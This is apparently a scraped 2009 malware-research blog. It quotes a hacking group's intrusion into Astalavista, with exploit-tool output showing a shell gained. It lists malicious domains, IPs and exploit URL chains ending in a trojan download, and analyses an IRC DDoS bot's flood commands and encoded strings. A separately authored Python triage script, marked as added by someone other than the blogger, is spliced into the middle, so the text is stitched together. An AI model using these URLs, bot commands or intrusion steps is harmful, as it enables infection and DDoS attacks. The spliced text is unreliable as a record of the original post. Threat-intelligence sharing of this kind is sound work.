Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the "community" but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.

We wanted to see how good that "team of security and IT professionals" really is.

Let's begin.

anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner...
LiteSpeed
[+] Injecting shellcode...
[-] Wait for it

[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)

Thursday, June 4, 2009

Target vulnerability on Microsoft DirectShow??

Since Microsoft announced that their product contains a critical vulnerability, attackers have started targeting users who have not updated to the latest patches. I foresee it will become another attack wave affecting users who surf the Internet frequently.

According to an article from SecurityFocus, Microsoft warned that the DirectShow vulnerability also affects Apple QuickTime, which uses the DirectX library.....

The Microsoft Security Response Center is blogging about this ....

If you have doubts about your systems, please run the online check at http://support.microsoft.com/gp/cp_fixit_main#tab0


You may consider the F-Secure Exploit Shield product; it seems their beta is able to counter the DirectShow vulnerability..

References about this:
1. http://www.microsoft.com/technet/security/advisory/971778.mspx
2. Microsoft article 971778
3. CVE Reference http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1537
4. F-Secure Exploit Shield vs DirectShow

Malicious URLs * 04-June-09*

IP Address: 193.108.81.200
Domain lists:

greatbethere.cn
lotbetsite.cn
thebestyoucanfind.cn


IP Address:
72.232.242.82
Domain lists:

kit-fuck.biz
porn-master.biz
teen.porn-here.biz

Attack operation from kraton.penggingcity.com starting?? Botnet? Zombie?

Hi dude, while harvesting malicious websites I found one txt file containing all the IRC commands used once the trojan is installed on a victim machine and connects back to IRC. From the content, it seems the infected machines become a botnet, or zombies, used to perform DDoS against target machines. Since I can't understand Portuguese, it is a puzzle for me to put it all together in a short time :(.

This file called "prendedor.pl"

First, try to gather where the source came from:

http://125.163.251.219/har ??

Your IP Address: 125.163.251.2
IP Address Hostname: 2.subnet125-163-251.speedy.telkom.net.id
IP Country: Indonesia
IP Country Code: IDN
IP Continent: Asia
IP Region: Yogyakarta
Guessed City: Yogyakarta
IP Latitude: -7.7828
IP Longitude: 110.3608
ISP Provider: PT. Telecomunikasi Indonesia


kraton.penggingcity.com = 94.23.114.15 (GERMANY)

Your IP Address: 94.23.114.15
IP Address Hostname: 94.23.114.15
IP Country: Germany
IP Country Code: DEU
IP Continent: Europe
IP Region:
Guessed City:
IP Latitude: 51
IP Longitude: 9
ISP Provider: Connecting Life


irc.racrew.us = 82.146.54.69

Your IP Address: 82.146.54.69
IP Address Hostname: admin.indovds.com
IP Country: Russian Federation
IP Country Code: RUS
IP Continent: Europe
IP Region:
Guessed City:
IP Latitude: 60
IP Longitude: 100
ISP Provider: ISPsystem at NAC


174.34.131.70

Your IP Address: 174.34.131.70
IP Address Hostname: el8.com.br
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: Ohio
Guessed City: Cleveland
IP Latitude: 41.3861
IP Longitude: -81.7102
ISP Provider: JinxShells


209.20.65.73

Your IP Address: 209.20.65.73
IP Address Hostname: 209-20-65-73.slicehost.net
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: Missouri
Guessed City: Saint Louis
IP Latitude: 38.6446
IP Longitude: -90.2533
ISP Provider: Slicehost LLC


74.3.40.137


Your IP Address: 74.3.40.137
IP Address Hostname: h-74-3-40-137-static.lsanca54.covad.net
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: California
Guessed City: Culver City
IP Latitude: 34.0202
IP Longitude: -118.3928
ISP Provider: Covad Communications



A few keywords were found in the script, like these:

!target NICK (Especifica novo alvo)\n";
!ctcpflood (Envia flood ctcp)\n";
!dccflood (Envia flood dcc)\n";
!noticeflood (Envia flood de notice)\n";
!msgflood (Envia flood de mensagens)\n";
!hop #chan msg (Entra e sai de um canal deixando msg)\n";


According to the header comment of the script, it was written by:
#
# PIXEL ELITE RAQUERS POWER RANGERS BUBLEGUM
# since 2001 listening to backstreet boys
#
#


and the IRC server "irc.racrew.us" will surely be used by whoever calls themselves "racrew".

The bot hides under a different name each time: it picks its IRC nick from a long hard-coded pool of surnames (the @nickname array in the script), so the attacker's bots show up in the channel under many different nicknames.


Below are the few strings the script decodes with MIME::Base64:

use MIME::Base64;

# base64-encoded constants as they appear in the script
$string1 = "ZGFya2x5";
$string2 = "Y0t6";
$string3 = "cGFuYQ==";
$string4 = "RnVzaW9u";
$string5 = "SXowbg==";
# decoded at runtime before use
$string6 = decode_base64($string1);
$string7 = decode_base64($string2);
$string8 = decode_base64($string3);
$string9 = decode_base64($string4);
$string10 = decode_base64($string5);


"ZGFya2x5" --> darkly
"Y0t6" --> cKz
"cGFuYQ==" --> pana
"RnVzaW9u" --> Fusion
"SXowbg==" --> Iz0n
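Added example (my code, not from the post or from the script's authors): a small static triage helper in Python that pulls out of a captured bot script the same artefacts the notes above were collected by hand, namely the base64 constants that are actually passed to decode_base64, the advertised !commands, the size of the nick pool and the C2 host/port. The embedded Perl fragment is constructed for the example and reuses the base64 values quoted above; the hostname is a placeholder.

```python
import base64
import binascii
import re

# Constructed fragment of a Perl IRC bot, modelled on the prendedor.pl
# artefacts described in the post (base64 constants fed to decode_base64,
# a pool of surnames used as nicks, !command help strings, a C2 host and
# port). Sample input for this example only; the hostname is a placeholder.
SAMPLE_SCRIPT = r'''
#!/usr/bin/perl
use MIME::Base64;
my $server = "irc.example.invalid";
my $port = 6667;
my $version = "v1";
@nickname = ("Abdulrazak","Ackerman","Adams","Addison");
$string1 = "ZGFya2x5";
$string2 = "Y0t6";
$string3 = "cGFuYQ==";
$string6 = decode_base64($string1);
$string7 = decode_base64($string2);
$string8 = decode_base64($string3);
print "!target NICK (Especifica novo alvo)\n";
print "!ctcpflood (Envia flood ctcp)\n";
print "!msgflood (Envia flood de mensagens)\n";
print "!hop #chan msg (Entra e sai de um canal deixando msg)\n";
'''

# Scalar assigned a bare base64-looking literal: $name = "QUJD";
B64_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([A-Za-z0-9+/]+={0,2})"\s*;')
# Variables really handed to MIME::Base64's decode_base64().
DECODE_CALL = re.compile(r'decode_base64\(\s*\$(\w+)\s*\)')
# Bot command handlers advertised in help strings: "!target ...".
COMMAND = re.compile(r'"(![a-z]+)\b')
# C2 endpoint: $server = "..."; $port = 6667;
SERVER = re.compile(r'\$(?:server|host|irc)\w*\s*=\s*"([^"\s]+)"', re.I)
PORT = re.compile(r'\$port\w*\s*=\s*(\d+)', re.I)
# Nick pool: @nickname = ("A","B",...);
NICK_POOL = re.compile(r'@\w*nick\w*\s*=\s*\((.*?)\)\s*;', re.I | re.S)

def decode_b64_constants(script):
    """Map variable name -> decoded text for literals that are valid base64
    AND are passed to decode_base64(); short literals that merely look like
    base64 (version tags, flags) are skipped."""
    used = set(DECODE_CALL.findall(script))
    decoded = {}
    for name, literal in B64_ASSIGN.findall(script):
        if name not in used:
            continue
        try:
            raw = base64.b64decode(literal, validate=True)
        except (binascii.Error, ValueError):
            continue
        decoded[name] = raw.decode("latin-1")
    return decoded

def extract_commands(script):
    """Ordered, de-duplicated list of the !commands the bot documents."""
    return list(dict.fromkeys(COMMAND.findall(script)))

def extract_c2(script):
    """(host, port) pairs; port falls back to 6667 (plain IRC) if absent."""
    ports = [int(p) for p in PORT.findall(script)] or [6667]
    return [(host, ports[0]) for host in SERVER.findall(script)]

def nick_pool_size(script):
    """How many hard-coded nicks the bot can rotate through."""
    m = NICK_POOL.search(script)
    return len(re.findall(r'"[^"]*"', m.group(1))) if m else 0

def triage(script):
    """One-shot static summary of a captured IRC bot script."""
    return {
        "c2": extract_c2(script),
        "commands": extract_commands(script),
        "decoded": decode_b64_constants(script),
        "nick_pool_size": nick_pool_size(script),
    }
```

The decoded strings, the command list and the C2 host are what you would feed into IRC egress monitoring and blocklists; the nick pool size explains why the same bot shows up under many different names.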


Sigh... tired of looking for the "prendedor.pl" file?
Search for it on the giant search engine, Google.
You will find that many websites host this file; their owners probably don't even know that their servers are controlled by the bad guys to perform DDoS against target machines. :(

Similar information about this botnet can be found at http://web17.webbpro.de/index.php?page=infobox-ru-botnet

Wednesday, June 3, 2009

PDF exploits become more complex and more obfuscated

No doubt the PDF exploit vector is still a threat that gets the attention of several security vendors. PDF exploits have existed in the wild since 2007 and their number has increased over time. According to Symantec's recent Global Internet Security Threat Report 2008, web-based attacks related to PDF exploits ranked 2nd, at 11 percent of the top web-based attacks. Besides that, web browser plug-in vulnerabilities also contributed to the increase in web-based PDF exploits. F-Secure also showed that PDF exploit attacks increased from 28.61% in 2008 to 48.87% in 2009. The number of PDF exploits looks set to keep rising this year, since several PDF generator tools such as Metasploit are available and ready to use.
PDF malware generators will produce more complex obfuscated code in the coming days, and that will challenge the security vendors' analysis skills and time.

Below are a few graphs on the Adobe Reader 7, 8 and 9 vulnerabilities from 2003 to 2009. This information was obtained from Secunia. Thanks Secunia!

Other good websites related to PDF exploits:
1. http://www.sophos.com/blogs/sophoslabs//?p=4600
2. http://securitylabs.websense.com/content/Blogs/3411.aspx
3. http://www.sophos.com/blogs/sophoslabs/v/post/1221
4. http://www.web2secure.com/2009/05/analysis-exploit-adobe-pdf-utilprintf.html
5. http://www.f-secure.com/weblog/archives/00001687.html
6. http://www.f-secure.com/weblog/archives/00001676.html

Malicious URLs * 03-June-09*


Note: If you think this information benefits you, click on an advertisement to support me with the domain fees.

Tuesday, June 2, 2009

Rogue Antivirus - 02 June 09



Malware related links *bjhh.cn* - 02 June

Links:
Level 0>http://www.bjhh.cn/360/360.htm
Level 1>http://www.bjhh.cn/360/x.htm
Exploit:
Sina Downloader BID-30223
OurGame various errors SA30469
RealPlayer Import stack overflow CVE-2007-5601
Level 2>http://cnnic.zik.dj/vv.css (Trojan)
Level 2>http://www.bjhh.cn/360/all.css
Level 3>http://www.bjhh.cn/360/4.htm
Exploit:
RealAudioObjects.RealAudio ActiveX control CVE-2008-1309
Level 4>http://cnnic.zik.dj/vv.css (Trojan)
Level 3>http://www.bjhh.cn/360/3.htm
Level 2>http://www.bjhh.cn/360/1.htm
Exploit:
Microsoft Windows MDAC Vulnerability CVE-2006-0003
Level 3>http://www.bjhh.cn/360/15.js
Level 3>http://www.bjhh.cn/360/16.js
Level 2>http://www.bjhh.cn/360/newlz.htm
Level 3>http://www.bjhh.cn/360/newlz.css
Level 2>http://www.bjhh.cn/360/s.htm
Exploit:
Sina Downloader BID-30223
Level 3>http://www.bjhh.cn/360/office.css
Level 4>http://cnnic.zik.dj/vv.css
Level 2>http://www.bjhh.cn/360/office.htm
Exploit:
ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution CVE-2008-2463
Level 3>http://www.bjhh.cn/360/office.css
Level 4>http://cnnic.zik.dj/vv.css (Trojan)
Level 2>http://www.bjhh.cn/360/bf.htm
Level 3>http://www.bjhh.cn/360/2.css
Level 3>http://www.bjhh.cn/360/bf.js
Level 2>http://www.bjhh.cn/360/cx.htm
Level 3>http://www.bjhh.cn/360/2.css
Level 2>http://www.bjhh.cn/360/2.htm
Exploit:
Ourgame GLWorld HanGamePluginCn18 Class ActiveX Control Buffer Overflows CVE-2008-0647
Level 2>http://www.bjhh.cn/360/pp.htm
Level 3>http://www.bjhh.cn/360/pp.pdf
Level 2>http://www.bjhh.cn/360/7.htm
Level 3>http://www.bjhh.cn/360/7.css
Level 1>http://www.bjhh.cn/360/fff.swf
Level 1>http://www.bjhh.cn/360/iie.swf

The sample was submitted to VirusTotal.

Disclaimer:

The URL links posted above contain malicious files/trojans/viruses that could harm your systems and lead to your information being stolen. Usage: the URL links posted here are for IT security officers, researchers and personal collection only. Any harmful actions are totally prohibited. Use them at your own risk, and wisely. Any risks and consequences are entirely outside this web owner's responsibility.

Monday, June 1, 2009

Malware related links - 01 June

Malware domain: 218.213.77.96

Level 0:>http://218.213.77.96/a.js
Level 1:>http://218.213.77.96/help2.html
Level 2:>http://218.213.77.96/flash.htm
Level 3:>http://218.213.77.96/iqq.htm
Level 3:>http://218.213.77.96/fqq.htm
Level 2:>http://218.213.77.96/a4.htm
Level 3:>http://218.213.77.96/14.js
Level 4:>http://218.213.77.96/123.exe -->Trojan
Level 2:>http://218.213.77.96/a2.htm
Level 2:>http://js.users.51.la/2886082.js
Level 2:>http://www.51.la/?2886082
Level 2:>http://img.users.51.la/2886082.asp

VirusTotal result:
http://www.virustotal.com/analisis/bdf8b6ce2d2579b7d52dd91add66eabed34ca72aa1de7517d00ffd118c2e2bac-1243861991